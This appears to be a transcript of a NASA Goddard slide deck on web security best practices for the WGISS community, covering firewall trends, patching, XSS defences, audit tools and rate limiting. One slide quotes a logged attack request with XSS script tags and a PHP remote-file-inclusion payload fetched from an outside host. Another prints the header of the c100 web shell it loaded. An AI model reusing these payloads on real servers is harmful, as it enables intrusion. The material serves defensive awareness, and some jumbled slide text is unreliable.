Security - wgiss
Download
Report
Transcript Security - wgiss
Security:Best Practices
GSFC: What we have seen
1990's: Very Porous (Non-Existent), Default Allow
2000's: Much Tighter, Default Deny
Restricted Ports
20
21
22
22
23
25
25
80
80
443
Smaller attack surface,
increased attack
attempts
High
Ports
Goddard “Firewall”
GSFC Servers
102465535
Two Major Trends
1. Increase in web services offered:
GCMD Web API's
OGC Catalogue Services for Web (CSW)
Other CEOS and GEOSS services
2. Increase in web based attacks:
well known COTS or Open Source web vulnerabilities
attacks on in-house code
social engineering
The WGISS Community Dilemma
We have a responsibility to serve our users
We have a responsibility to collaborate
The web is the best current mechanism
But the use of web services use may decrease our
security posture
Solution:
proactive security awareness
use of security best practices
communicating threats and solutions in our community
COTS/Open Source
Software Vulnerabilities
Real World Examples: The Attack
Seen in Logs (Decoded):
83.217.66.50 - - [03/Sep/2007:05:56:51 -0400] "GET
http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script> Hello Admin! Today%2
0You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include
("http://xyz.altervista.org/private2.txt?"); ?><ahref="<?php require ($files_dir.'/_custom_menu_link.php');
?>"><?php require($files_
dir.'/_custom_menu_name.php'); ?></<br><ahref="<?php require($files_dir.'/_custom_menu_name.php');
?>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<ahref="<?php
require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php
require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php
require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?=
>ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt?
HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows N
T 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT
Real World Examples: the Payload
Payload at http://xyz.altervista.org/private2.txt:
<?php
/*******************************************************************************
* Locus7s Modified c100 Shell
* Beta v. 1.0a - Project x2300
* Written by #ophAcker team
* Modified by error & Be_gO
* Re-Modified by #error_maker (15.2.07)
*========================================================
* New Modifications Implemented -* -Added link to Enumerate to escalate priviledges
* -Added Rootshell.c
* -Added Rootshell.c;auto-compiler
* -Execute Rootshell.c
* -Added Mig-Log Logcleaner
* -Execute Mig-Log Logcleaner
* -milw0rm searcher (Grabs OS and searches milw0rm)
* -Locus7s Style & Image
* -Added w4ck1ng Shell Backdoor Connect and Backdoor
* -Added PHP-Proxy link to hide you
* -Added your ip and server ip with whois capability
* -Added private 0day released by allahaka which utilizes the linux
* sudo bash to execute a stack overflow. (Continued)
Best Practices: COTS/OSS
Wisely choose COTS/OSS Web Applications
Stay on top of software security patches
schedule regular maintenance checks
remotely audit for security vulnerabilities
Limit access
what is the security record?
is the software maintained?
does this application need to be open to the world?
can authentication be used?
Review your Logs
In-House Web Application
Software Vulnerabilities
Real World Example: Defacement
Defacement
NASA:
“Astrology”
High value
Soft target
Examples:
HTML manipulation
XSS
SQL injection
Element
manipulation
(example)
<img src=”http://site/cgi/image-resizer.cgi?url=jpl.nasa.gov%2Fgalaxy.jpg”>
http://site/cgi/image-resizer.cgi?url=mysite.com%2Fnasacalc.jpg
Source: apod.nasa.gov
Real World Example: Defacement
Best Practices
Defense:
Hash Table
Flatfile or database
Key = 123221 Value = “url=jpl.nasa.gov%2Fgalaxy.jpg”
URL = http://site/cgi/image-resizer.cgi?url=123221
Encrypted Hash Function
Algorithmic
“jpl.nasa.gov%2Fgalaxy.jpg” -> hash function -> ADGCDDARG
URL = http://site/cgi/image-resizer.cgi?url=ADGCDDARG
Cross Site Scripting (XSS) Example
Source: msdn2.microsoft.com
Cross Site Scripting Defences
Best Practices:
Understand the types of XSS attacks
client side (i.e. javascript vulnerabilities)
non-persistent (i.e. error messages)
persistent (i.e. bulletin boards)
Validate user Input
Utilize software security libraries
Limit access
General Best Practices
Best Practice: Perform Regular
Security Audits
Examples:
NMAP for network and service audits
NESSUS for security scans
scans for all network vulnerabilities
commercial support available
Nikto for specific web vulnerabilities
OS detection
service version detection
over 3500 dangerous files/CGIs
over 250 web server vulnerabilities
Intrusion Detection System Reporting
Best Practice: Limiting Access
Incorporate Authentication
Specify Allow/Deny Directives
Utilise Firewall Rules
Implement Rate limiting
Iptables (Linux) example:
-A SSH -m recent --set --name WEB
-A SSH -m recent --update --seconds 60 --hitcount 600 --rttl --name WEB -j DROP
-A SSH -j ACCEPT
Best Practice: Understand the
Software
Apache: Compile your own
Manually
Loaded Modules
Compiled
in Default
server, with
RedHat
rewrite,
5.1 httpd:
alias, and proxy added :
core_module
core (static) mod_access
(static) mpm_prefork_module
(static) mod_auth(static)
(static)http_module
mod_include(static)
(static)so_module
mod_log_config
(static)
(static)auth_basic_module
mod_env (static) mod_setenvif
(shared) auth_digest_module
(static) mod_proxy(shared)
(static) proxy_connect
authn_file_module
(static)
(shared)
proxy_ftpauthn_alias_module
(static) proxy_http (static)
(shared)
prefork
authn_anon_module
(static) http_core(shared)
(static) mod_mime
authn_dbm_module
(static)
(shared)
mod_status
authn_default_module
(static) mod_autoindex
(shared)
(static)
authz_host_module
mod_asis (static) (shared)
mod_cgi authz_user_module
(static) mod_negotiation
(shared)
(static) mod_dir
authz_owner_module
(static) mod_imap
(shared)
(static)
authz_groupfile_module
mod_actions (static) mod_userdir
(shared) authz_dbm_module
(static) mod_alias
(shared)
(static) mod_rewrite
authz_default_module
(static) mod_so
(shared)
(static)
ldap_module (shared) authnz_ldap_module (shared)
include_module (shared) log_config_module (shared) logio_module (shared) env_module (shared)
ext_filter_module (shared) mime_magic_module (shared) expires_module (shared) deflate_module
(shared) headers_module (shared) usertrack_module (shared) setenvif_module (shared) mime_module
(shared) dav_module (shared) status_module (shared) autoindex_module (shared) info_module
(shared) dav_fs_module (shared) vhost_alias_module (shared) negotiation_module (shared)
dir_module (shared) actions_module (shared) speling_module (shared) userdir_module (shared)
alias_module (shared) rewrite_module (shared) proxy_module (shared) proxy_balancer_module
(shared)
proxy_ftp_module
(shared) RPM
proxy_http_module
Disadvantage:
No RedHat
Updates (shared) proxy_connect_module (shared)
cache_module (shared) suexec_module (shared) disk_cache_module (shared) file_cache_module (shared)
mem_cache_module (shared) cgi_module (shared) version_module (shared) proxy_ajp_module (shared)
Best Practice: Understand the
Software (cont.)
OpenGIS® Catalogue Services Specification, Page 168
10.11.3.4 Delete action
The following XML Schema fragment defines a delete action:
<xsd:complexType name="DeleteType" id="DeleteType">
<xsd:sequence>
<xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/>
</xsd:sequence>
<xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/>
<xsd:attribute name="handle" type="xsd:ID" use="optional"/>
</xsd:complexType>
The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of
records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in
order to prevent every record in the catalogue from inadvertently being deleted.
The typeName attribute is used to specify the collection name from which records will be deleted.
The handle attribute is described in subclause 10.11.3.2.
Other Best Practices
Security in depth
Understand trust relationships
multiple mechanisms for limiting access
multiple authentication mechanisms
with other projects
with other agencies
Focus on data integrity
Good, reliable, tested backups
Prevent data misuse or misattribution
Employ a knowledgeable, dependable staff
Conclusion
The scientific community depends on the quality
and accuracy of the data
With the proliferation and interdependence of web
services, the assurance that those services are
accurate and secure becomes increasingly critical
The introduction of one security flaw into a web
services based architecture could have a
widespread, international impact